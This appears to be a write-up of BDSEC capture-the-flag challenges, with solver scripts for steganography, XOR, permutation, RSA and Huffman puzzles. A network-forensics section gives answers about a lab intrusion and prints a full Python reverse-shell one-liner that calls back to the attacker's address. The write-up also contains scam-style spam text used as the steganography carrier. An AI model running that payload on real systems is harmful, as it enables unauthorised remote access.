with Senate bill 1623 ; Title 6 , Section 309 . This 
is NOT unsolicited bulk mail . Why work for somebody 
else when you can become rich inside 11 weeks ! Have 
you ever noticed people will do almost anything to 
avoid mailing their bills plus how long the line-ups 
are at bank machines ! Well, now is your chance to 
capitalize on this . WE will help YOU deliver goods 
right to the customer's doorstep and use credit cards 
on your website . You are guaranteed to succeed because 
we take all the risk . But don't believe us . Mrs Jones 
of Illinois tried us and says "I've been poor and I've 
been rich - rich is better" . We assure you that we 
operate within all applicable laws . We BESEECH you 
- act now ! Sign up a friend and your friend will be 
rich too ! Warmest regards . Dear Professional ; Your 
email address has been submitted to us indicating your 
interest in our briefing ! If you no longer wish to 
receive our publications simply reply with a Subject: 
of "REMOVE" and you will immediately be removed from 
our mailing list . This mail is being sent in compliance 
with Senate bill 1623 ; Title 6 ; Section 302 ! This 
is not multi-level marketing ! Why work for somebody 
else when you can become rich in 99 weeks ! Have you 
ever noticed people love convenience and nearly every 
commercial on television has a .com on in it ! Well, 
now is your chance to capitalize on this ! We will 
help you sell more plus deliver goods right to the 
customer's doorstep . You can begin at absolutely no 
cost to you . But don't believe us ! Prof Ames of South 
Carolina tried us and says "My only problem now is 
where to park all my cars" . We are licensed to operate 
in all states . You have no reason not to act now . 
Sign up a friend and you get half off ! Thanks . Dear 
Salaryman ; Especially for you - this hot announcement 
! If you are not interested in our publications and 
wish to be removed from our lists, simply do NOT respond 
and ignore this mail ! This mail is being sent in compliance 
with Senate bill 1621 , Title 1 , Section 306 . Do 
NOT confuse us with Internet scam artists . Why work 
for somebody else when you can become rich in 46 days 
! Have you ever noticed more people than ever are surfing 
the web plus people love convenience ! Well, now is 
your chance to capitalize on this ! WE will help YOU 
deliver goods right to the customer's doorstep and 
process your orders within seconds . You can begin 
at absolutely no cost to you ! But don't believe us 
. Mr Ames of Virginia tried us and says "Now I'm rich, 
Rich, RICH" ! We are a BBB member in good standing 
. You will blame yourself forever if you don't order 
now . Sign up a friend and you'll get a discount of 
10% ! Thanks . 

在网站上解码

网站:https://spammimic.com/decode.cgi
结果:Hello Mr.Alex   I won't 100000 M USD dolor. Can  you want that, you need this key   BDSEC{do3sn't_b3li3ve_1n_unkn0wn_mail} 

Dominoes

密文没法写,就是用y作了个加密

#! /usr/bin/python3


def x(a, b):
    # Unused helper: nothing in this file calls it, and it could not run as
    # written -- `t` is not defined anywhere in this file and `h` is never used.
    h = ""
    for i in range(len(a), len(b)):
        t.push(y(b[i]))

    return "".join(a)


def y(c):
    """Encrypt c: each character becomes the XOR of itself with every character after it.

    The last character is left unchanged; an empty input returns "".
    """
    out = []
    for idx, ch in enumerate(c):
        folded = ord(ch)
        for later in c[idx + 1:]:
            folded ^= ord(later)
        out.append(chr(folded))
    return "".join(out)


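def z():
    """Read flag.txt, encrypt it with y(), and write the result to encrypted.txt."""
    # Context managers close both handles even if y() raises; the original left
    # the read handle open and relied on the interpreter to collect it.
    with open("flag.txt", "r") as f:
        flag = f.read()
    enc_flag = y(flag)
    with open("encrypted.txt", "w") as f:
        f.write(enc_flag)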


if __name__ == "__main__":
	z()

逐个用后边的字符异或,逆向时从后向前作

enc = open("encrypted.txt", "rb").read()
a = [0]*len(enc)
for i in range(len(enc)-1, -1, -1):
    b = enc[i]
    for j in range(i+1, len(enc)):
        b ^= a[j]
    a[i] = b

print(bytes(a))
#BDSEC{n0t_50_e45y_hUh?_433}

Loop Lover

密文:kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9

算法:

def f(t):
    """Scramble t by three nested passes of adjacent swaps; the result is a permutation of t."""
    chars = list(t)
    n = len(t)
    for i in range(n):
        for j in range(i, n - 1):
            # One inner pass carries chars[j] rightwards to position n - 2.
            for k in range(j, n - 2):
                chars[k], chars[k + 1] = chars[k + 1], chars[k]
    return "".join(chars)

if __name__ == "__main__":
    flag = open("flag.txt", "r").read()
    open("ciphertext.txt", "w").write(f(flag))

解法:原程序本身就是个交换位置,只需要弄个同长的串正向得到位置然后找回来即可

def f(t):
    """The challenge's scrambler: three nested passes of adjacent swaps (pure permutation)."""
    chars = list(t)
    n = len(t)
    for i in range(n):
        for j in range(i, n - 1):
            for k in range(j, n - 2):
                chars[k], chars[k + 1] = chars[k + 1], chars[k]
    return "".join(chars)


# f() only moves characters, so scrambling a marker string of the same length
# (32, like the ciphertext) shows where every position ends up.
flag = '0123456789abcdefghijklmnopqrstuv'
print(f(flag))

ttt = '15dtu9cb80gi6sqhnolmf7rke4ja32pv'   # the output printed above
c = 'kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9'
# Plaintext position p landed at ttt.index(flag[p]); read the ciphertext back in that order.
d = ''.join(c[ttt.index(marker)] for marker in flag)

from base64 import *
print(b64decode(d))

# BDSEC{ju57_L00p_m3_4w4y}

Basically RSA

唯一的一个rsa题,n很小可分解

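#N: 1280678415822214057864524798453297819181910621573945477544758171055968245116423923

#E: 65537

#C: 241757357533719849989659127349827982677055294256023833052829147857534659015212862
p = 1899107986527483535344517113948531328331
q = 674357869540600933870145899564746495319033
n = 1280678415822214057864524798453297819181910621573945477544758171055968245116423923
e = 65537
c = 241757357533719849989659127349827982677055294256023833052829147857534659015212862

# Textbook RSA with a factorable modulus, stdlib only: pow(e, -1, m) is the
# modular inverse (Python 3.8+) and int.to_bytes replaces long_to_bytes, so
# neither gmpy2 nor pycryptodome is needed.
assert p * q == n, "p and q do not multiply to N -- check the factorisation"
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
m = pow(c, d, n)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))
#BDSEC{r54_i5_fUn_r16h7?}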

MISC

Message of Hufflepuff

哈夫曼编码

密文按编码从头对照,手工处理即可 

00101 B
111   D
00110 S
1011  E
1001  C
00111 {
00010 H
01000 u
1000  f
1000  f
00100 m
01011 @
1101  n
1100  _
1011  E
1101  n
00001 c
01100 0
01001 d
01101 1
1101  n
1010  g
1100  _
1010  g
01010 o
01110 7
1100  _
111   D
01111 3
1001  C
00011 O
111   D
01111 3
111   D
00000 }

BDSEC{Huffm@n_Enc0d1ng_go7_D3COD3D}

Find Me Inside

下载下来是一张图片

用binwalk解出数据

Sld xlfow R yv hl olhg
Rm z kozxv R pmld hl dvoo?
Sld xlfow R yv hl yilpvm
Rm z uznrob hl gltvgsvi?
Sld xlfow R yv hl olmvob
Hfiilfmwvw yb hl nzmb?
Sld xlfow R yv hl fmszkkb
Hfiilfmwvw yb hl nfxs yvzfgb?
Sld xlfow R yv nv
Dsvm vevm R ivnzrm z nbhgvib?
YWHVX{N33n_gsv_yfggviuob_tlvh_fk_fk_zmw_zdzb}

这个基本就是词频的事了,放到 quipquip.com 上查得到

BDSEC{M33m_the_butterfly_goes_up_up_and_away}

NetWorking

这个题有20问,过关形式,过到十几就没走下去

这是一个网络测试攻击抓的包,先是用arp探测然后探测网站,试ftp密码,成功后下载文件,用webshell在网站起9001端口,登入后下载poc程序提权。

-------Victim & Attacker
25
NSTechvally is a multinational hosting & cloud service providing company. Recently we have detected some unusual activity on the server. An attacker got access to our server. And we recently found out that the developer made some mistakes while developing our website. We have captured the network traffic. Help us find out how the attacker compromised our server.

Attachments

capture.pcapng
N.B: This is the challenge file for all the networking challenges.
What is the server ip & the attacker ip? 攻击和服务器的IP

Flag Format: BDSEC{0.0.0.0_127.0.0.1}


BDSEC{192.168.1.13_192.168.1.10} 

------Which FTP?
50
What ftp server & version is the server using?  ftp程序及其版本号

Flag Format : BDSEC{ftp_0.0.0}

BDSEC{vsFTPd_3.0.3}

-----FTP Creads
50
What is the ftp username & password?  ftp用户名和密码

Flag Format : BDSEC{username_password}
BDSEC{ftpadmin_ftpadmin}

----Uploaded File
50
What file did the attacker upload to the ftp server? [with location]
  上传的文件
Flag Format : BDSEC{/location/file_name}
BDSEC{/files/.hacker.note}

----Log File
50
What is the log file name?  日志文件叫啥

Flag Format : BDSEC{something.log}
BDSEC{vsftpd.log}

----Project Incharge
50
Who was the incharge of the website project?  负责人,这个通过看3个邮件email1,2,3

Flag Format : BDSEC{name}
BDSEC{Mark}

----Loooong Loooog
50
Can you analyze the log file & pick out the date and time of the first successful login?

Flag Format : BDSEC{day_month_date_ti:m:e} Example Flag : BDSEC{Sun_May_16_15:38:13}
###nM...log  Thu Jul 14 10:16:59 2022 [pid 8631] [ftpadmin] OK LOGIN: Client "::ffff:192.168.1.10"
BDSEC{Thu_Jul_14_10:16:59}  首次登录成功时间,在日志文件里

----Administrator
50
What is the admin panel username & password?

Flag Format : BDSEC{username_password}
BDSEC{demo_demo}


----Shell
50
What reverse shell payload did the attacker use to gain a reverse shell? 攻击者用来获得反向shell的payload

Flag Format : BDSEC{payload in plain text}
BDSEC{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'} #这个怎么也总觉得不会这么长,还真是这么长

----Secret Key
50
What is the secret key?   密钥,这个在数据库表里

Flag Format : BDSEC{secretKey}
BDSEC{2jo3t12nv51w1pw4wk1kj58s1jb6w0}

----Database Admin
50
What is the database username & password?  数据库用用户密码

Flag Format : BDSEC{username_password}
BDSEC{root_root}

----HostName
50
What is the hostname of the server? 主机名(把括号去掉,空格换下划线)

Flag Format : BDSEC{hostname}
BDSEC{Ubuntu}

----CodeName
50
What is the codename the server?  在主机信息里的CODENAME

Flag Format : BDSEC{Codname}
BDSEC{xenial}

----Server Info
50
What server & version the server is using? (main os)

Flag Format : BDSEC{servername_version_something_something} 
Example Flag : BDSEC{CentOS_2022.2_LTS_GNU_Linux} 主机名(把括号去掉,空格换下划线)
BDSEC{Ubuntu_16.04.1_LTS_Xenial_Xerus}

----Service Exploit
50
Which service package did the attacker use to gain root access to the server?

Flag Format : BDSEC{package_name} 攻击者用来获取root权限的包名
BDSEC{}  ?


----Exploit Exploit Exploit
50
Which exploit did the attacker use to gain root access to the server?

Flag Format : BDSEC{exploit_name}
BDSEC{}  ?

----Vulnerable Service
50
Which utility is vulnerable to pwnkit?  哪个应用容易受到pwnkit的攻击

Flag Format : BDSEC{utility_name}
BDSEC{}  ???
----msg.txt
50
What is the content of msg.txt?

Flag Format : BDSEC{content_of_the_msg_file}
BDSEC{The_Server_Is_Now_under_My_Control_:D_:D}  msg文件是在nc后手工输入的

----Attacker
50
What is the attacker name?

Flag Format : BDSEC{attacker}
BDSEC{}  ?

----Server User's
50
How many users' home directories were listed on the server? 数一下home目录下的用户数

Flag Format : BDSEC{0}
BDSEC{8}
